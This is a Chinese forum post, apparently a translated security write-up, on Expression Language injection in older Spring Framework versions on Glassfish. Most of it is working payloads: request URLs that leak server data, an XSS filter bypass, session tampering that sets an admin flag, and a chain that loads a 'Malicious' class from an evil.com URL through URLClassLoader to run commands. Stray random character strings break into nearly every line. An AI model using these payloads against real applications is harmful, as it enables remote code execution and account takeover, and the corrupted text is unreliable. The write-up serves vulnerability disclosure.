Remote Code with% {7 g& W0 c0 z0 ?' K+ ^9 G, S( e
Expression Language Injection3 g% c6 e7 D' v: O
Spring Framework脆弱性—DanAmodio" s7 @8 }$ K. t5 n# J
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
3 Z% L. J# Z3 h% }. g |/ h: |可能会存在风险。3 F+ [/ q3 V- M# E7 c# @( a" y9 z
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的4 {( \# p: v3 I8 B' [; @" \" Q
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可 B1 H% v5 `+ b& O
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,0 n% n4 B8 V4 q/ Q3 ~( P5 ^
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
5 c7 `* N( p5 h版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
& S v- o% P) b7 _8 a由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但0 A" ~( }$ E( \
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
9 T$ S/ ]& a% f: p. I本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
$ [, o( C- O2 i: N这些版本不支持禁用double EL resolution.( b# h, _) n/ W4 H2 h
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
' L' U! }6 G+ S: @2 F2 C eEL2.2容器上可能进行远程代码执行。
5 b: }' z/ j! U& l4 @! G- S这是一个原始信息泄露的攻击例子:6 a8 i! B/ x/ ]1 X. J4 ^0 M) ]
请求:
8 U! e" I; z0 t+ j/ y- |ttp://vulnerable.com/foo?message=${applicationScope}
) n% W3 e2 B. \8 G \. I6 ?( ^2 t# R5 |到达以下内容页面:
8 z" a& q8 V! n% b; t结果将输出一些包含内部服务器信息calsspath 和本地工作目录2 O! B1 f4 y2 F; Y
你也可以做一些其他事情,如这样:3 B" T) ?2 ], ~ I. {9 Z0 K! t
${9999+1}. ^/ l7 ^% l+ c( c# G, L1 O6 `
还可以访问session 对象和beans
. i* Z; l; y+ s. I${employee.lastName}
. R) @1 _5 J! d4 h1 @7 ?在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
8 S( S4 s* r6 [+ F O, L7 wEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东* i& P( D/ j% n0 p9 t7 t' w
西,比如XSS.
' p5 C' k5 n. a; s# @哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签8 L B. u- X; w2 M) z! ]- V2 A
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
; V% O, x& f$ h2 `; n; u呢?”# D9 D, K7 d. ~7 E
因此,我尝试巳缦拢� F8 }- }: d2 N
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
5 B% m# O8 m# v3 M# DP2 v9 U' u) u' y' q
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
' H1 ` W! p; S: I" P+ ]回的文本被插入进了spring:message 标签。+ r0 v" d$ k6 y& K+ m6 K8 S
这里是一个最终绕过过滤的实例:
- r8 ^7 L2 L. @1 Ahttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ1 V$ X( Q' c8 T: ?! O$ e
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为2 _+ _% ~% }' h
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
; {: U6 A3 P0 C- D6 n经过一番研究,我学习到EL2.2 增加了方法调用。
# a2 W- F$ W" U9 {' p4 T+ `% A我写了一个快速测试应用程序代码并且检测一些功能
. H- q- ~; n }& j${pageContext.request.getSession().setAttribute(“account”,”123456″)}
3 e! E* h) {/ s, A${pageContext.request.getSession().setAttribute(“admin”,true)}
1 }, a! w# s' A" Q. y$ H好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
2 h2 _4 g1 f: h3 e# K8 C1 ~指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?$ x! H! [! q* u( Y. h4 A. K! F
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
& i8 r* _9 G) Z; o( d“, 1234)}
# y! v5 k! k4 y$ W' \% `& g${“”.getClass().forName(“java.lang.Runtime”)}4 ^; l* ]2 N9 } L s" _, T
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不7 K! D% [' a- k# K- n
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
/ N* ~* ^2 W3 N! ~数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
& T+ \$ ~' j& x7 @1 g一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于) G1 K* q& M3 Z# s7 ]) ~/ r, w
方法签名invoke(Object obj, Object„ args)- Z& y. B9 \# `& V
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
9 ~; i, S) p5 @% P: F% r1 J! o题,以让它可以工作起来。+ w( e% P$ v; Y5 w! H% j8 n; L
漏洞利用:2 v+ ?; |) K1 |* f
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
: R( A+ D }! i希望你们中的一些JAVA奇才告诉我我是如此的可笑。
: H% I* e m6 ~ H, X9 m( N' s这里有一些我试过的失败的用例,为了试图让它工作的用例:( v# f: ?& ^1 E+ {9 H: K& z* H
写文件到文件系统
! q E, i- s0 Y0 K+ W6 r* @0 E 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.+ g5 `7 y. K! h7 H% X( o
我认为这些可以很好的工作,但是我不能找到合适的类来载入。- a# V% L/ ^% D) r, [0 }$ @
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
0 H4 A% I, x7 T v+ b: U- gjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
& J g* y; e; ~5 r8 ^, X Dorg.springframework.expression.spel.standard.SpelExpressionParser not found
$ p, Q: K" H/ G$ y! cby
/ X) ~0 J( S- w4 ^& _7 Qorg.glassfish.web.javax.servlet.jsp [194].! q& R' p$ e9 U: I: ~! b/ a1 l
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
3 T, _" R5 B/ r& Y9 ?( [0 | 利用反射来创建一个新的Runtime(and watch the world burn)
0 M+ z- |! ^; y+ O${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName. T3 A. Y6 T- A: [ ?
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
" U# `1 H( [/ R4 e( I6 J/ U${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}, c7 T0 l+ ?/ s4 w* ^# f' M, _8 |% j
使用java.lang.ProcessBuilder
5 y' H7 z: R! i8 N& F" S 用表达式语言来评估表达式语言
' U7 U8 @& B' F6 K5 y1 @; e0 sExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.7 }. N. `1 C' t6 N: m4 t
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
* F- p2 c/ u, Y6 q& b+ r; E“,”".getClass(),null)}
0 j6 I* A( ^8 @7 F# j1 X$ o, o 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)4 e; ]; W% R+ t2 X% V
我在使用一个空数组通过Method.invoke()时失败了很多次
8 B$ a* r* q" Z' X! r; h“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
y; D/ N: Y5 ]% D: ?) k.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A: x# N0 E8 }9 Z( f4 n
rrayList”).newInstance().toArray())/ C9 ]2 M: e. Q) g. y, w" [+ g" L
java.lang.IllegalArgumentException: wrong number of arguments7 b D) D) d1 G7 W# F' D8 a, G/ T
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
; ? y* U5 P% v9 c/ b以创建一个恶意class文件并且指向类装载器.0 R4 E0 E* u' k4 J
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
7 y. n) [# Z* A5 g. O+ r9 spublic class Malicious {* y. I$ Q# q7 |, [4 c$ K
public Malicious() { X- _5 C- v9 D1 h1 F7 ~; B2 F
try {
; t5 a, D0 r8 `- N6 _! N: hjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
' {3 e. W' S% Z3 }6 @, E: Ijava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win: X( H) C6 k1 D! O8 ? M6 G* S
} catch (Exception e) {
; D3 j3 ]# }) W+ d/ d6 _}1 ^$ f l9 t, D( l0 r6 [+ C O
}
2 }/ M& k8 n, s+ Z( Q2 H9 o b我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回$ }' \8 P- C: v7 ]
话中,因此它可以被使用.
2 g$ Q4 D* _% T" B% a) t" B7 G${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
6 h" I( i. i( @(“java.util.ArrayList”).newInstance())}
, R; F" _ F' T5 `" Y) h/ W& N1 ~URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建$ y: y( L2 q/ j2 m& \& W$ x
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
# V0 m# }# c9 O: igetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
- q h9 O' H1 S' Z/ q- B3 D" J) |# a我们可以调用的create(string)方法,然后转换对一个URL对象。0 Y) y; W: { ?% |+ c2 I+ R
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh p& v' k, ?" R, T; L6 Z* Q( a, s
ere/malicious/classfile/is/located/”).toURL())}" A9 y5 J9 v6 R! p7 ^! R
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
# a% R$ B- ?" A R, P; @恶意类文件被装载并创建,触发远程代码.1 {# r; k: W& ?) [5 E+ p
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte' Q* ~4 h c- N# x
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
* w4 g3 k& A1 _& E H3 `5 DgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance( w1 m# ^0 U( a2 }
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对